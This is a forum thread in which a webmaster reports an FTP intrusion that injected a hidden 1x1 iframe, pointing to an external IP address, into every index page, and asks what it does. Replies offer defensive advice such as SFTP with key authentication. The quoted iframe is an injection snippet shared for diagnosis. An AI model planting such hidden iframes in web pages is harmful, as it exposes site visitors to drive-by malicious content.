what is this hacker upto?

Upon checking my logs of my server, I noticed a hacker ftp into my main account and edited all index.html and index.php to include the following

Code:

---


<iframe src="91.201.28.6/goods/index.php" width="1" height="1" frameborder="0"></iframe>'; ?>

---

i checked it against the server and it redirects to google home page. The funny part is the ip originates somewhere in ukraine

What could this hacker be upto? I blocked his ip address and change the password of my account. But what other measures can I take?

btw he's ip source is from 94.247.209.32

move your ftp server to a non default port would help discourage most script kiddies, but an nmap will show whats on any port anyways

the best thing you can do is make sure your password is very strong, but you could also switch to using ssh/sftp only and use a public/private key authentication for even more security

I had the same code planted in my index files, I don't know if it's harmfull because it just redirects to google.

There's a virus going round and when it gets on your pc it searches for ftp logins, my ftp access logs show that that ip from russia was where they downloaded & uploaded the edited index files.

You've done the right thing changing passes I done what "coopstah13" said and now use sftp.
Try also doing a scan on your pc for viruses.


_____________________
Regards,
Ben
Fico-CEO